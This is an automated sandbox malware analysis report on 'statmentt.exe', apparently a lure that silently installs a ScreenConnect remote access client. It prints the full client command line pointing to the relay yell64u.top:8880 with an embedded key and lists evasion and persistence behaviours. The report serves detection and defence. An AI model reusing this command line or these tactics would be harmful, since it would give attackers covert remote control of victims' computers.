Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
statmentt.exe

Overview

General Information

Sample name:statmentt.exe
Analysis ID:1578432
MD5:054251d2e1de783b0faed842d64fd893
SHA1:3e23d7c2777644dbe519b365d5e9cb80bfe3d402
SHA256:e1a3eb6e1ec31406443bfbe5067c1852706406a824a29c2490c8e1b73fcf0081
Tags:exeuser-malwarology
Infos:

Detection

ScreenConnect Tool
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • statmentt.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\statmentt.exe" MD5: 054251D2E1DE783B0FAED842D64FD893)
    • msiexec.exe (PID: 7468 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7500 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7568 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8DDF4D7DFA864A88ED87F00705A0EDAF C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7704 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6D5F870693EF3B6FD3A6AF241B788648 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7748 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B9FCDEB162140880EF803EB7EC0353E8 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7788 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7856 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "15e3aa5a-03ad-43c1-8c56-797fd84cc894" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 8012 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "5082607d-6583-424c-b175-f03711434b52" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
statmentt.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\68f19a.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSIF458.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1802003851.0000000005B10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000000.00000002.1785575924.0000000003251000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    0.2.statmentt.exe.5b10000.9.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      8.2.ScreenConnect.WindowsClient.exe.24bfa20.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        8.0.ScreenConnect.WindowsClient.exe.a0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          0.0.statmentt.exe.c85db8.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.2.statmentt.exe.5b10000.9.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c=", ProcessId: 7788, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7500, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: statmentt.exeReversingLabs: Detection: 21%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.2% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_040F0F08 CryptProtectData,7_2_040F0F08
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_040F16F1 CryptProtectData,7_2_040F16F1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05BE2F98 CryptUnprotectData,7_2_05BE2F98
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05BE13E4 CryptUnprotectData,7_2_05BE13E4
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05BE2EE0 CryptUnprotectData,7_2_05BE2EE0
                              Source: C:\Users\user\Desktop\statmentt.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\statmentt.exeEXE: msiexec.exeJump to behavior
                              Source: statmentt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: statmentt.exeStatic PE information: certificate valid
                              Source: statmentt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statmentt.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statmentt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888442965.0000000001550000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888844830.00000000015D2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statmentt.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1818911448.0000000000F6D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1799483150.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statmentt.exe, 68f199.msi.2.dr, 68f19b.msi.2.dr, MSIF488.tmp.2.dr, MSIF739.tmp.2.dr, 68f19a.rbs.2.dr, MSIF458.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statmentt.exe, 68f199.msi.2.dr, MSIEC0B.tmp.1.dr, 68f19b.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statmentt.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 85.239.34.190:8880
                              Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: yell64u.top
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.3028562442.0000000001C7A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
